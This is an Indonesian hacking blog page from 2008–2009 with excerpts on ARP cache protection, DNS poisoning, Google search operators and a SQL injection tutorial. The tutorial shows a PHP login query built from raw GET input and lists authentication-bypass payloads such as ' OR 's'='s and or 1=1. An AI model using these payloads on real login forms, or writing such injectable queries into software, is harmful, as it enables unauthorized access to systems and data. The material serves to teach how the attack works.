Mencegah Perubahan ARP Cache

January 2, 2009

Anda sudah melihat bagaimana kmputer dengan sistem operasi terbaru sekalipun gengan mudahnya bisa tertipu dengan paket racun ARP (Poisoning) yang mengakibatkan komputer anda dengan sukarela mengirimkan datanya ke komputer Hecker.

Mencegah hal ini terjadi bisa dilakukan dengan implementasi port security pada switch,tapi anda tidak bisa menggunakan switch biasa.Anda membutuhkan switch mmanageable atau switch yang bisa diatur dan biasanya switch semacam ini berkali-kali lipat harganya dibandingkan dengan switch biasa.

Solusi lainnya adalah dengan mencegah ARP cache di komputer anda berubah.Solusinya gunakan ARP cache statik.Sebagai contoh,melakukan ping ke komputer 192.168.200.3 untuk mengetahui alamat MAC dari komputer tersebut.

Read the rest of this entry »

1 Comment | Hacker | Tagged: , | Permalink
Posted by wanbule

Penyerangan dengan Menggunakan DNS Poisoning

November 26, 2008

Sangat menarik untuk di pelajari, itu kesan pertama penulis ketika membaca beberapa artikel tentang metode penyerangan ke nameserver dengan cara poisoning (memberikan racun) kepada nameserver yang memegang otoriti terhadap sebuah domain. Bagaimana cara memberikan racun kepada nameserver? Dan bagaimana dampaknya? Dalam artikel kali ini saya akan mencoba membahas materi ini dengan beberapa visualisasi.

Sebelum kita masuk dalam inti permasalahan saya akan jelaskan terlebih dahulu bagaimana proses query terjadi ketika Anda melakukan request terhadap sebuah domain. Setidaknya ada tiga nameserver yang akan di kontak ketika Anda melakukan request domain yang Anda inginkan. Ketiga nameserver itu adalah:

ISP Nameserver

Root nameserver

Authoritative nameserver

Read the rest of this entry »

Leave a Comment » | Hacker | Tagged: , , | Permalink
Posted by wanbule

Teknik Google Hacking

November 20, 2008

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

— 01 // Penggunaan Dasar

- Google tidak “case sensitive”.
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata “hacker” atau “cracker”

Read the rest of this entry »

Leave a Comment » | Hacker | Tagged: | Permalink
Posted by wanbule

SQL Injection

November 17, 2008

Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port p ort yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool .ke situs tersebut yang konon system yang seharga 152 milyar itu keamanannya berlapis lapis.

Dalam pembahasan ini hanya disebutkan basic atau dasar dasar dari teknik hacking yang dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang terproteksi sebagai siapa saja (anonymous) dengan hanya mengetahui username tanpa harus mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui username dan password sama sekali SQL Injection merupakan teknik hacking yang memanfaatkan perintah SQL untuk memanipulasi script pada web korban sehingga script tersebut meloloskan perintah SQL yang simasukkan si penyerang.

Ilustrasi Kasus

Dalam ilustrasi kasus ini kita akan membuat web server sebagai korban. Web server ini dibangun menggunakan :

Apache

untuk membangun web server

PHP

sebagai bahasa pemrograman

MySQL untuk database server

Pada server, terdapat script PHP untuk

memeriksa login sebagai berikut :

$username = $_GET['username'];

$password = $_GET['password'];

$sql = mysql_query(“SELECT * FROM

login WHERE username=’$username’ &&

password=’$password’”);

Nah! Script inilah yang akan kita manfaatkan untuk melakukan SQL injection

Sebagai Login standart seharusnya user harus

memasukkan

username

: admin

password

: 123456

Namun sebagai user yang ‘nakal’ kita tidak perlu mengetahui username dan password tersebut untuk dapat masuk. Cukup kita manfaatkan script PHP yang telah disebutkan diatas Kita siap dengan “niat jahat” kita. Untuk mewujudkan niat tersebut kita cukup membuat query SQL ‘kebingungan’ sehingga meloloskan nilai true atau string kosong (‘ ‘) tanpa mengecek keberadaan akun user pada field username dan password pada tabel login.

Kita masukkan script ‘ OR ’s’=’s pada input username dan password.

username = ‘ OR ’s’=’s

password = ‘ OR ’s’=’s

Script yang kita masukkan tadi akan mengacaukan query:

$sql = mysql_query(“SELECT * FROM login

WHERE username=’$username’ &&

password=’$password’”);

sehingga perintah query menjadi :

$sql = mysql_query(“SELECT * FROM login

WHERE username=’‘ OR ’s’=’s‘ &&

password=’‘ OR ’s’=’s‘”);

ini artinya jika

username = ‘ ‘ atau username = true dan

password = ‘ ‘ atau password = true

maka user akan dapat login

Kemungkinan kemungkinan script lainya :

or 1=1″

or 1=1or

1=1′

or ‘a’='a

” or “a”=”a

‘) or (‘a’='a

‘ or 0=0 “

or 0=0 or

0=0 ‘

or 0=0 #

Leave a Comment » | SQL injection | Tagged: | Permalink
Posted by wanbule